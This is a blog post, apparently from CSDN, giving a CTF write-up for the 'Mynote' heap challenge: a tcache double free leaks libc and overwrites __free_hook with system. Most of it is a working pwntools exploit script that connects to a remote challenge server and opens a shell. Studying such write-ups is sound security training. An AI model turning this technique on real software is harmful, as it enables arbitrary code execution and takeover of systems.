[tcache double free] Mynote

最新推荐文章于 2023-12-08 14:44:46 发布
最新推荐文章于 2023-12-08 14:44:46 发布
阅读量481 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/118662299
版权

[tcache double free]

1. ida分析

在这里插入图片描述

2.思路

  1. 先填满tcache,使用unstored bin泄漏libc的地址(这里只能申请9个chunk,可以将chunk 0 释放7次,填满tcache)
  2. 利用double free修改free_hook为system
  3. 释放chunk中内容是/bin/sh\x00的chunk,free_hook将chunk中的内容作为参数传入

3. exp

#!/usr/bin/env python
# coding=utf-8
# Author : huzai24601
from pwn import *
from LibcSearcher import *
#context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
#context(arch='amd64',os='linux',log_level='debug')
elf = ELF('./Mynote_Max')
#p=process(elf.path)
p = remote('47.99.38.177', 10001)
#local_libc_64  = ELF('/lib/x86_64-linux-gnu/libc.so.6')
local_libc_64 = ELF('./libc-2.27.so')
s=lambda data :p.send(data)
sa=lambda delim,data :p.sendafter(delim, data)
sl=lambda data :p.sendline(data)
sla=lambda delim,data :p.sendlineafter(delim, data) 
r=lambda numb=4096 :p.recv(numb)
ru=lambda delims :p.recvuntil(delims)
uu64=lambda data :u64(data.ljust(8,'\x00'))
leak=lambda name,addr :log.success('{} ===> {:#x}'.format(name, addr))


def debug():
    gdb.attach(p)
    pause()


def add(size,cont):
    sla(':','1')
    sla(':',str(size))
    sla(':',cont)

def show(index):
    sla(':','2')
    sla(':',str(index))

def free(index):
    sla(':','3')
    sla(':',str(index))

def remove_tcache(numb):
    for i in range(numb):
        free(i)
        free(i)

def fill_tcache(numb):
    for i in range(numb):
        add(0x100,'/bin/sh\x00')


add(0x90,'0')
add(0x90,'1')
add(0x90,'/bin/sh\x00')

for i in range(7):
    free(0)
free(1)
show(1)
ru('Content: ')

libc_base =uu64(r(6)) - 96 -local_libc_64.sym['__malloc_hook'] -0x10
print("offset-------"+hex(96+local_libc_64.sym['__malloc_hook']+0x10))
#libc_base =uu64(r(6)) - 0x3ebca0
leak("libc_base",libc_base)

system = libc_base+local_libc_64.sym['system']
free_hook = libc_base+local_libc_64.sym['__free_hook']

leak("free_hook",free_hook)
leak("system",system)


add(0x90,p64(free_hook))
add(0x90,p64(free_hook))
add(0x90,p64(system))
free(2)



p.interactive()
huzai9527
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
TCache-开源
04-25
TCache是​​高性能键/值存储组件。 它可以轻松地插入到任何现有的高性能,分布式内存对象缓存系统(例如MemcacheD或Dynamo)中,从而通过减少数据库负载来加速动态Web应用程序
[tcache double free + orw]MynoteMax
huzai9527的博客
07-11 216
[tcache double free + orw]MynoteMax 1. ida分析 漏洞点和Mynote一样,但是加了沙盒 禁用了execve,因此同样利用double free 和 uaf 进行 orw进行操作 2. 思路 本题需要从堆打到栈,需要利用一些通用的gadgets, 如setcontext + 53 将 free_hook 设置为 setcontext +53,再在相应的chunk中布置相应的sigframe free掉相应的chunk触发setcontext(srop),
lonelywolf_exp(tcache double free)
qq_33590156的博客
08-04 162
题目只能申请一个chunk指针,但是可以重复申请chunk,而且存在uaf,不可溢出 首先绕过tcache的check使用double free泄露堆地址(老版本是可以直接free的,但是新版本需要free后edit一下再free),然后通过uaf在tcache中存放好两个指针,一个用来修改size,一个用来free chunk,之后申请0x70chunk,和另一个chunk防止合并。接着通过第一根指针修改size>0x80,然后通过第二根指针free此chunk,使用double free将他fre
hitb2018_gundam —— tcache double free
weixin_48066554的博客
05-31 270
hitb2018_gundam —— tcache double free 高达?哪里有高达!
利用全局chunk数组,free(负数)来实现tcache double free
tbsqigongzi的博客
10-17 143
ciscn_2019_ne_6
Glibc 2.27关于Tcache的增强保护 .pdf
09-05
《Glibc 2.27 Tcache增强保护详解》 Glibc,作为Linux系统中最核心的C语言标准库,其安全性能对整个系统的稳定性至关重要。2.27版本的更新,特别是针对Tcache(线程缓存)分配机制的增强保护,是针对内存管理安全性...
【技术分享】glibc 2.27-2.32版本下Tcache Struct的溢出利用 .pdf
09-05
- 必须存在Use-After-Free (UAF) 漏洞,通过UAF可以控制内存中的数据。 - 程序中应有编辑或写入堆块的功能,以便利用UAF修改Tcache的数据。 2. **利用目的**: - 在满足条件的程序中,通过Tcache Struct溢出可以...
heap_exploit_2.31
03-21
tcache double free fastbin双免费 botcake的房子 其他堆利用技术与how2heap相同,因此我不编写其他代码-.- pwngdb pwngdb是用于堆利用的出色gdb脚本,但是在glibc 2.31中,tcache结构发生了
一个用于学习各种堆利用技术的存储库。-C/C++开发
05-26
教育性堆开发该仓库用于学习各种堆开发技术。 我们在一次hack会议上提出了这个想法,并实现...calc_tcache_idx.c演示glibc的tcache索引计算。 fastbin_dup.c通过滥用fastbin空闲列表,诱使malloc返回已经分配的堆指针。
linux_pwn(6)--tcache&&double free&&ciscn_2019_final_3
azraelxuemo的博客
03-10 1489
文章目录What is tcachepwn题例题检查代码分析add函数delete函数准备框架attack修改大小为unsorted bin范围free成unsorted bin难点,怎么泄露libcdouble free free_hook总结 What is tcache tcache是libc2.26之后引进的一种新机制,类似于fastbin一样的东西,每条链上最多可以有 7 个 chunk,free的时候当tcache满了才放入fastbin,unsorted bin,malloc的时候优先去tca
i春秋2020新春战役PWN之document(绕过tcachedouble free检测)
seaaseesa的博客
02-27 3136
Document 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,经典的增删改查程序 Delete功能没有清空指针,存在UAF漏洞 Create功能的size不可控 UAF无法修改到*heap处的内容,也就是next指针的值 Create功能最多允许创建7个堆 题目给我们的glibc版本为2.29,存在tcache机制,且增加了对tcache dou...
babyheap(uaf ,绕过tcache doublefree检测)
m0_51251108的博客
09-18 1043
浙江省第五届大学生网络与信息安全竞赛预赛pwn
double free detected in tcache 2问题记录
最新发布
Z_oioihoii
12-08 378
解释,当执行free(b);时会报错,因为在 b->Test();调用时已经执行了delete this;将堆区的内存释放掉,此时再次根据b的地址去释放会发现不存在,所以报错double free detected in tcache 2。
Tcache bin总结
N1rvana的博客
03-13 1583
Tcache Tcache是glibc 2.26之后引入的机制,与glibc 2.23版本下堆利用方式有一定区别,产生了新的利用方式。 0x1 相关结构体 tcache_entry typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry; tcache_entry用来链接空闲的tcache chunk,其中的next指针指向下一个大小相同的空闲tcache chunk。 注意:这里的next指针指向的是user
gyctf_2020_document
m0_57754423的博客
06-29 754
gyctf_2020_document buuoj
tcache attack
yeshen4328的专栏
11-01 184
tcache attack tcache double free double free可以通过对同一块内存free两次,实现任意地址写。当libc版本在2.26以上时,free的块优先放入tcache,malloc也优先从tcache中取,性能更好。但是安全检查变弱了。 static void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); ass
2021 强网杯 pwn notebook
yongbaoii的博客
04-18 604
kernal pwn 给了几个文件,然后来看看启动文件 #!/bin/sh stty intr ^] exec timeout 300 qemu-system-x86_64 -m 64M -kernel bzImage -initrd rootfs.cpio -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" -nographic -net user -net nic -device e1000 -smp cores=2,threads=2
free(): double free detected in tcache 2 如何解决
热门推荐
qq_49101164的博客
04-19 3万+
free(): double free detected in tcache 2 如何解决 原因 free():在tcache 2中检测到双空闲,在执行程序的过程中对同一块内存单元进行了两次free()操作。 在循环中包含free();语句,容易出现这类问题。 解决方法 可以设置两个指针,进行操作,下面给出示范 出现double free() 的报错 只设置了一个指针变量n,在循环的过程中,会再次对n进行free();操作因此会出现此次问题 double free()得到解决 设置两个指针变量,
double free detected in tcache
03-16
这是一个内存错误,通常在使用C或C++编程语言时出现。...可以使用内存分配和释放函数(例如malloc和free)来帮助管理内存。 如果这个问题在使用第三方库时出现,那么可能需要查看库的文档或寻求支持来解决这个问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值